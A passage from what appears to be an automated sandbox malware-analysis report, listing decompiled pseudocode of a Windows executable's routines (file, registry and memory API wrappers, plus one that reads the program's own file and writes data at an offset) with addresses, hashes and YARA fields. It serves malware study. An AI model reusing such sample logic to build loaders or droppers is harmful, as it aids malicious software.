				int _t4;

				_t4 = CreateDirectoryA(E0040340C(__eax), 0); // executed
				asm("sbb eax, eax");
				return _t4 + 1;
			}




                                                                                                                          0x00404ebd
                                                                                                                          0x00404ec5
                                                                                                                          0x00404ec9

                                                                                                                          APIs
                                                                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,00404E7A,00000000,00404E9F,?,?,00000000,00000000,00000000,00000000,?,004076D4,00000000,0040798C), ref: 00404EBD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDirectory
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4241100979-0
                                                                                                                          • Opcode ID: 386e56552f8266bde2ccc84166bcc5ed92a1d83404cd9177086d901dfc68956f
                                                                                                                          • Instruction ID: 54881843ca4f04485c80971131db710ee83c2c1d717b1f588eca7c15a420d4f4
                                                                                                                          • Opcode Fuzzy Hash: 386e56552f8266bde2ccc84166bcc5ed92a1d83404cd9177086d901dfc68956f
                                                                                                                          • Instruction Fuzzy Hash: 71B092927542401AEA003ABA2CC2B2A098C974460EF10093AF206EA283D47AC9050014
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404B9C, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404B9C() {
				void* _t3;
				long _t5;
				void* _t6;
				void* _t10;

				_t5 = GetFileAttributesA(E00404490(_t3)); // executed
				_t6 = _t5 + 1;
				_t10 = _t6;
				if(_t10 != 0) {
					return _t6 - 0x00000001 & 0 | _t10 == 0x00000000;
				}
				return _t6;
			}







                                                                                                                          0x00404ba2
                                                                                                                          0x00404ba7
                                                                                                                          0x00404ba7
                                                                                                                          0x00404ba8
                                                                                                                          0x00000000
                                                                                                                          0x00404bad
                                                                                                                          0x00404bb0

                                                                                                                          APIs
                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,00407EDD,00000000,00408020,?,?,00000000,00000000,?,0040819C,00000000,00408220), ref: 00404BA2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3188754299-0
                                                                                                                          • Opcode ID: 8025a4ee7f9a6a5e32ffee1429e28f2d9b7c921bde027667d06e53d93cfb3014
                                                                                                                          • Instruction ID: b116303671e024f583cda4c1147e2dbfbac77b887c659148fe5224e5fd1b100a
                                                                                                                          • Opcode Fuzzy Hash: 8025a4ee7f9a6a5e32ffee1429e28f2d9b7c921bde027667d06e53d93cfb3014
                                                                                                                          • Instruction Fuzzy Hash: 65A012C682120114CC1071F1220375A0144E4C02CC38448A62350B00C2C83CE501001D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404CF8, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404CF8(CHAR* __eax) {
				long _t4;
				void* _t5;
				void* _t9;

				_t4 = GetFileAttributesA(__eax); // executed
				_t5 = _t4 + 1;
				_t9 = _t5;
				if(_t9 != 0) {
					return _t5 - 0x00000001 & 0 | _t9 != 0x00000000;
				}
				return _t5;
			}






                                                                                                                          0x00404cf9
                                                                                                                          0x00404cfe
                                                                                                                          0x00404cfe
                                                                                                                          0x00404cff
                                                                                                                          0x00000000
                                                                                                                          0x00404d04
                                                                                                                          0x00404d07

                                                                                                                          APIs
                                                                                                                          • GetFileAttributesA.KERNEL32(?,00404E3F,00000000,00404E9F,?,?,00000000,00000000,00000000,00000000,?,004076D4,00000000,0040798C,?,0000144A), ref: 00404CF9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3188754299-0
                                                                                                                          • Opcode ID: 1dfe280059354c2d3b00f373a1eb4cf2bc4e4ec1fc5d2a6436fb04a1a0edb6b0
                                                                                                                          • Instruction ID: 74a4a45bf51c4893599122cbb6035ce0c32fa2704c567f2e8b32d3ffb48088ed
                                                                                                                          • Opcode Fuzzy Hash: 1dfe280059354c2d3b00f373a1eb4cf2bc4e4ec1fc5d2a6436fb04a1a0edb6b0
                                                                                                                          • Instruction Fuzzy Hash: 66A002C686650749DD1022E56607AAE0249FCD12D8B9D5D665391FA1C2C93CA992902E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404BB4, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404BB4(void* __eax, signed int __ecx, long __edx) {
				long _t2;

				_t2 = SetFilePointer(__eax, __edx, 0, __ecx & 0x000000ff); // executed
				return _t2;
			}




                                                                                                                          0x00404bbc
                                                                                                                          0x00404bc1

                                                                                                                          APIs
                                                                                                                          • SetFilePointer.KERNEL32(00000000,000003E8,00000000,?,00407179,00000000,004071BF,?,00000000), ref: 00404BBC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FilePointer
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 973152223-0
                                                                                                                          • Opcode ID: 7cf7d094e1152e8ce2a36ef2ea1d814d027d71488bb8302382125c90c8a75838
                                                                                                                          • Instruction ID: 68b303876a78b47fa373b2f01407b4ce5b79aa50a67d4c8f5d0a49418ed6adba
                                                                                                                          • Opcode Fuzzy Hash: 7cf7d094e1152e8ce2a36ef2ea1d814d027d71488bb8302382125c90c8a75838
                                                                                                                          • Instruction Fuzzy Hash: 69A002D85902203AF8182363AC5FF37105C97C0B55FD0855E7351754C164EC6A241039
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004057CC, Relevance: 1.5, APIs: 1, Instructions: 5registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004057CC(void* __eax) {
				long _t2;

				if(__eax != 0) {
					_t2 = RegCloseKey(__eax); // executed
					return _t2;
				}
				return __eax;
			}




                                                                                                                          0x004057ce
                                                                                                                          0x004057d1
                                                                                                                          0x00000000
                                                                                                                          0x004057d1
                                                                                                                          0x004057d6

                                                                                                                          APIs
                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00407AA9,00000000,00407AC4,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00408200,00000000,00408220), ref: 004057D1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Close
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3535843008-0
                                                                                                                          • Opcode ID: 9b062cc1fd15f9a7cdea17de8857f10556f104151196c74c597c2625a5dbf84f
                                                                                                                          • Instruction ID: d7bf673f47417472780d573f697a526d705f21e10240e56d59e5a06888d75167
                                                                                                                          • Opcode Fuzzy Hash: 9b062cc1fd15f9a7cdea17de8857f10556f104151196c74c597c2625a5dbf84f
                                                                                                                          • Instruction Fuzzy Hash: 6B900244D0050351DD202A730845917146C64402C5BD404776400F29C5ED7DC5005438
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040137C, Relevance: 1.3, APIs: 1, Instructions: 62COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0040137C(void* __eax, intOrPtr* __ecx, intOrPtr __edx) {
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				intOrPtr* _v32;
				intOrPtr* _t24;
				intOrPtr _t27;
				intOrPtr _t31;
				int _t32;
				intOrPtr* _t35;
				intOrPtr* _t42;
				void* _t43;
				void* _t44;
				intOrPtr* _t45;

				_t45 =  &_v20;
				_v32 = __ecx;
				 *_t45 = __edx;
				_v28 = 0xffffffff;
				_v24 = 0;
				_t44 = __eax;
				_v20 =  *_t45 + __eax;
				_t35 =  *0x40a5d4; // 0x640eb4
				while(_t35 != 0x40a5d4) {
					_t42 =  *_t35;
					_t43 =  *(_t35 + 8);
					if(_t44 <= _t43 && _t43 +  *((intOrPtr*)(_t35 + 0xc)) <= _v20) {
						if(_t43 < _v28) {
							_v28 = _t43;
						}
						_t31 = _t43 +  *((intOrPtr*)(_t35 + 0xc));
						if(_t31 > _v24) {
							_v24 = _t31;
						}
						_t32 = VirtualFree(_t43, 0, 0x8000); // executed
						if(_t32 == 0) {
							 *0x40a5b0 = 1;
						}
						E00401184(_t35);
					}
					_t35 = _t42;
				}
				_t24 = _v32;
				 *_t24 = 0;
				if(_v24 != 0) {
					 *_v32 = _v28;
					_t27 = _v24 - _v28;
					 *((intOrPtr*)(_v32 + 4)) = _t27;
					return _t27;
				}
				return _t24;
			}
















                                                                                                                          0x00401380
                                                                                                                          0x00401383
                                                                                                                          0x00401387
                                                                                                                          0x0040138a
                                                                                                                          0x00401394
                                                                                                                          0x00401398
                                                                                                                          0x0040139f
                                                                                                                          0x004013a3
                                                                                                                          0x004013fc
                                                                                                                          0x004013ab
                                                                                                                          0x004013ad
                                                                                                                          0x004013b2
                                                                                                                          0x004013c3
                                                                                                                          0x004013c5
                                                                                                                          0x004013c5
                                                                                                                          0x004013cb
                                                                                                                          0x004013d2
                                                                                                                          0x004013d4
                                                                                                                          0x004013d4
                                                                                                                          0x004013e0
                                                                                                                          0x004013e7
                                                                                                                          0x004013e9
                                                                                                                          0x004013e9
                                                                                                                          0x004013f5
                                                                                                                          0x004013f5
                                                                                                                          0x004013fa
                                                                                                                          0x004013fa
                                                                                                                          0x00401404
                                                                                                                          0x0040140a
                                                                                                                          0x00401411
                                                                                                                          0x0040141b
                                                                                                                          0x00401421
                                                                                                                          0x00401429
                                                                                                                          0x00000000
                                                                                                                          0x00401429
                                                                                                                          0x00401433

                                                                                                                          APIs
                                                                                                                          • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 004013E0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1263568516-0
                                                                                                                          • Opcode ID: fa7a78eec5dd89a8b83c49400664c27073319ee3a8c610895c3709d3653ec505
                                                                                                                          • Instruction ID: f327295f0dbb7d02968337953404c96d08b75f0734ec548ae522820371e35f3d
                                                                                                                          • Opcode Fuzzy Hash: fa7a78eec5dd89a8b83c49400664c27073319ee3a8c610895c3709d3653ec505
                                                                                                                          • Instruction Fuzzy Hash: CB21E570608741AFD710DF19C880A5FBBE0EB85720F14C96AE8989B7A5D378E841DB5A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00401434, Relevance: 1.3, APIs: 1, Instructions: 54memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00401434(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x40a5d4; // 0x640eb4
				while(_t29 != 0x40a5d4) {
					_t17 =  *(_t29 + 8);
					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}












                                                                                                                          0x0040143b
                                                                                                                          0x0040143f
                                                                                                                          0x00401446
                                                                                                                          0x0040145b
                                                                                                                          0x00401463
                                                                                                                          0x00401469
                                                                                                                          0x0040146f
                                                                                                                          0x00401472
                                                                                                                          0x004014b6
                                                                                                                          0x0040147a
                                                                                                                          0x00401480
                                                                                                                          0x00401484
                                                                                                                          0x00401486
                                                                                                                          0x00401486
                                                                                                                          0x0040148c
                                                                                                                          0x0040148e
                                                                                                                          0x0040148e
                                                                                                                          0x00401494
                                                                                                                          0x004014a1
                                                                                                                          0x004014a8
                                                                                                                          0x004014aa
                                                                                                                          0x004014b0
                                                                                                                          0x00000000
                                                                                                                          0x004014b0
                                                                                                                          0x004014a8
                                                                                                                          0x004014b4
                                                                                                                          0x004014b4
                                                                                                                          0x004014c5

                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 004014A1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4275171209-0
                                                                                                                          • Opcode ID: 6562d44be094aac9c3416d4300413632571bdfff9e6fcfdcc884fc208ae27054
                                                                                                                          • Instruction ID: 651c7d6b6741c998796b49b102b161bb2341ec2eea25b0c045f05b7ed0c0d4f4
                                                                                                                          • Opcode Fuzzy Hash: 6562d44be094aac9c3416d4300413632571bdfff9e6fcfdcc884fc208ae27054
                                                                                                                          • Instruction Fuzzy Hash: E7117072A04701AFC310DF29CD80A2BB7E1EBC4750F15C63DE598673B5D638AC408795
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004014C8, Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 93%
                                                                                                                          			E004014C8(void* __eax, void** __ecx, void* __edx) {
				int _t7;
				void* _t9;
				signed int _t14;
				intOrPtr* _t19;
				signed int _t22;
				void** _t23;

				_push(__ecx);
				 *_t23 = __eax + 0x00000fff & 0xfffff000;
				_t22 = __eax + __edx & 0xfffff000;
				 *__ecx =  *_t23;
				_t7 = _t22 -  *_t23;
				__ecx[1] = _t7;
				_t19 =  *0x40a5d4; // 0x640eb4
				while(_t19 != 0x40a5d4) {
					_t9 =  *(_t19 + 8);
					_t14 =  *((intOrPtr*)(_t19 + 0xc)) + _t9;
					if(_t9 <  *_t23) {
						_t9 =  *_t23;
					}
					if(_t22 < _t14) {
						_t14 = _t22;
					}
					if(_t14 > _t9) {
						_t7 = VirtualFree(_t9, _t14 - _t9, 0x4000); // executed
						if(_t7 == 0) {
							 *0x40a5b0 = 2;
						}
					}
					_t19 =  *_t19;
				}
				return _t7;
			}









                                                                                                                          0x004014cc
                                                                                                                          0x004014dd
                                                                                                                          0x004014e4
                                                                                                                          0x004014ed
                                                                                                                          0x004014f1
                                                                                                                          0x004014f4
                                                                                                                          0x004014f7
                                                                                                                          0x00401537
                                                                                                                          0x004014ff
                                                                                                                          0x00401505
                                                                                                                          0x0040150a
                                                                                                                          0x0040150c
                                                                                                                          0x0040150c
                                                                                                                          0x00401511
                                                                                                                          0x00401513
                                                                                                                          0x00401513
                                                                                                                          0x00401517
                                                                                                                          0x00401522
                                                                                                                          0x00401529
                                                                                                                          0x0040152b
                                                                                                                          0x0040152b
                                                                                                                          0x00401529
                                                                                                                          0x00401535
                                                                                                                          0x00401535
                                                                                                                          0x00401544

                                                                                                                          APIs
                                                                                                                          • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00000000,00004003,0040172F), ref: 00401522
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1263568516-0
                                                                                                                          • Opcode ID: 366ed2c7ca182d6b4595971b05bf8940527af6e3e06c25c2a4c3263d2ce5472b
                                                                                                                          • Instruction ID: c2f9954cc8299db513f2c37eb2bc070e0fd4fafed15322d1c8bcd52f3136bf23
                                                                                                                          • Opcode Fuzzy Hash: 366ed2c7ca182d6b4595971b05bf8940527af6e3e06c25c2a4c3263d2ce5472b
                                                                                                                          • Instruction Fuzzy Hash: E501F7736043006FC3109E28DDC092A77A4EBC5324F15053EDA85AB3A1D73AAC0587A8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004070DC, Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 31%
                                                                                                                          			E004070DC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				intOrPtr _t19;
				intOrPtr _t24;

				_push(0);
				_push(_t24);
				_push(0x407126);
				_push( *[fs:eax]);
				 *[fs:eax] = _t24;
				E004049D0(0, __ebx,  &_v8, __edi, __esi); // executed
				E00404C78(E0040340C(_v8), __ebx, 0xa200, 0x40a698, __edi, __esi); // executed
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E0040712D);
				return E00403094( &_v8);
			}






                                                                                                                          0x004070df
                                                                                                                          0x004070e3
                                                                                                                          0x004070e4
                                                                                                                          0x004070e9
                                                                                                                          0x004070ec
                                                                                                                          0x004070f4
                                                                                                                          0x0040710b
                                                                                                                          0x00407112
                                                                                                                          0x00407115
                                                                                                                          0x00407118
                                                                                                                          0x00407125

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileModuleName
                                                                                                                          • String ID: MZP
                                                                                                                          • API String ID: 514040917-2889622443
                                                                                                                          • Opcode ID: 2f22c95ce754a069faf3e5d71a99af3f29d8e87556c895829c3b73c460f21ff1
                                                                                                                          • Instruction ID: dbacf8f9bda0d2f3624fed2e55e69454661720eb62c3ca271fb24a4619442e3b
                                                                                                                          • Opcode Fuzzy Hash: 2f22c95ce754a069faf3e5d71a99af3f29d8e87556c895829c3b73c460f21ff1
                                                                                                                          • Instruction Fuzzy Hash: 32E09270708304AFE701EB72DC13A19B7ACD78A704FA24877E600AA6D1DA7DAE118519
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404B90, Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404B90(void* __eax) {
				signed int _t4;

				_t4 = CloseHandle(__eax); // executed
				return _t4 & 0xffffff00 | _t4 != 0x00000000;
			}




                                                                                                                          0x00404b91
                                                                                                                          0x00404b9b

                                                                                                                          APIs
                                                                                                                          • CloseHandle.KERNEL32(00000000,00404CD0,00000000,00404CE6), ref: 00404B91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2962429428-0
                                                                                                                          • Opcode ID: ef71f196dd3e8bd5321f6bf3e93503307ae4868d30203b0da39ae7c2a7e1010a
                                                                                                                          • Instruction ID: f540dd3953723152695a7cfd94b4b723d26dbf970bde7b3718d3bc06e0259ed2
                                                                                                                          • Opcode Fuzzy Hash: ef71f196dd3e8bd5321f6bf3e93503307ae4868d30203b0da39ae7c2a7e1010a
                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00407678, Relevance: .1, Instructions: 123COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 52%
                                                                                                                          			E00407678(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v40254;
				char _v41488;
				char _v41492;
				char _v41496;
				intOrPtr _v41500;
				char _v41504;
				char _v41508;
				char _v41512;
				char _v41516;
				intOrPtr _v41520;
				char _v41524;
				char _v41528;
				char _v41532;
				char _v41536;
				void* _t49;
				void* _t101;
				intOrPtr _t133;
				intOrPtr _t137;
				intOrPtr _t138;

				_t100 = __ebx;
				_t137 = _t138;
				_t101 = 0x144b;
				do {
					_push(0);
					_push(0);
					_t101 = _t101 - 1;
					_t139 = _t101;
				} while (_t101 != 0);
				_push(_t101);
				_push(_t137);
				_push(0x40798c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t138;
				E00405008( &_v41492, __ebx, _t101);
				_push( &_v41492);
				E004031F4( &_v41496, 9, 0x4091b4);
				_pop(_t49);
				E00403214(_t49, _v41496);
				E00404DE0(_v41492, __ebx); // executed
				E00405008( &_v41504, __ebx, 9);
				_push(_v41504);
				E004031F4( &_v41508, 9, 0x4091b4);
				_push(_v41508);
				E004031F4( &_v41512, 3, 0x4091dc);
				_push(_v41512);
				E004032CC();
				E00405200(_v41500, __ebx, __esi, _t139); // executed
				E004049D0(0, _t100,  &_v41516, __edi, __esi);
				_v8 = E00405B60(_v41516,  &_v41516);
				_push(_t137);
				_push(0x40789f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t138;
				E00405008( &_v41524, _t100, 3);
				_push(_v41524);
				E004031F4( &_v41528, 9, 0x4091b4);
				_push(_v41528);
				E004049D0(0, _t100,  &_v41536, __edi, __esi);
				E00404ED0(_v41536,  &_v41532);
				_push(_v41532);
				E004032CC();
				_v12 = E00405B24(_v41520, 0x40000103);
				_push(_t137);
				_push(0x407882);
				_push( *[fs:eax]);
				 *[fs:eax] = _t138;
				E0040597C(_v8);
				E00405974();
				E00405988(_v8);
				E0040254C( &_v40254, 4,  &_v16);
				E00407080( &_v41488, _v16, 0x3e8);
				E0040598C(_v12);
				E00405974();
				E00405BE8(_v12, E0040597C(_v8) - 0x14400, _v8);
				_pop(_t133);
				 *[fs:eax] = _t133;
				_push(E00407889);
				return E00404520(_v12);
			}

























                                                                                                                          0x00407678
                                                                                                                          0x00407679
                                                                                                                          0x0040767b
                                                                                                                          0x00407680
                                                                                                                          0x00407680
                                                                                                                          0x00407682
                                                                                                                          0x00407684
                                                                                                                          0x00407684
                                                                                                                          0x00407684
                                                                                                                          0x00407687
                                                                                                                          0x0040768a
                                                                                                                          0x0040768b
                                                                                                                          0x00407690
                                                                                                                          0x00407693
                                                                                                                          0x0040769c
                                                                                                                          0x004076a7
                                                                                                                          0x004076b8
                                                                                                                          0x004076c3
                                                                                                                          0x004076c4
                                                                                                                          0x004076cf
                                                                                                                          0x004076da
                                                                                                                          0x004076df
                                                                                                                          0x004076f5
                                                                                                                          0x004076fa
                                                                                                                          0x00407710
                                                                                                                          0x00407715
                                                                                                                          0x00407726
                                                                                                                          0x00407731
                                                                                                                          0x0040773e
                                                                                                                          0x0040774e
                                                                                                                          0x00407753
                                                                                                                          0x00407754
                                                                                                                          0x00407759
                                                                                                                          0x0040775c
                                                                                                                          0x00407765
                                                                                                                          0x0040776a
                                                                                                                          0x00407780
                                                                                                                          0x00407785
                                                                                                                          0x00407793
                                                                                                                          0x004077a4
                                                                                                                          0x004077a9
                                                                                                                          0x004077ba
                                                                                                                          0x004077cf
                                                                                                                          0x004077d4
                                                                                                                          0x004077d5
                                                                                                                          0x004077da
                                                                                                                          0x004077dd
                                                                                                                          0x004077e3
                                                                                                                          0x004077f3
                                                                                                                          0x00407806
                                                                                                                          0x00407819
                                                                                                                          0x0040782c
                                                                                                                          0x0040783f
                                                                                                                          0x0040784c
                                                                                                                          0x00407867
                                                                                                                          0x0040786e
                                                                                                                          0x00407871
                                                                                                                          0x00407874
                                                                                                                          0x00407881

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e2ffbce9ad41ee186f7f6225872613ed6a0bd1f14c14150b1f77e3a925856f57
                                                                                                                          • Instruction ID: bad4d56910de55197467fd61e6ec6c56c875cf63360af75c5594bc2395637eb8
                                                                                                                          • Opcode Fuzzy Hash: e2ffbce9ad41ee186f7f6225872613ed6a0bd1f14c14150b1f77e3a925856f57
                                                                                                                          • Instruction Fuzzy Hash: 42514170B002199BDF10EB69CC51A9DB7B5EB46308F1084FAA404772D1DA3DAF458E5A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004080E4, Relevance: .1, Instructions: 83COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 82%
                                                                                                                          			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _v24;
				char _v28;
				void* _v32;
				char _v36;
				intOrPtr _t26;
				void* _t36;
				void* _t47;
				void* _t48;
				intOrPtr _t71;
				void* _t79;
				void* _t81;
				void* _t86;

				_t86 = __fp0;
				_t81 = __eflags;
				_t76 = __esi;
				_t75 = __edi;
				_t54 = __ebx;
				_v36 = 0;
				_v28 = 0;
				_v32 = 0;
				_v24 = 0;
				E00403F14(0x408054);
				_push(_t79);
				_push(0x408220);
				_push( *[fs:eax]);
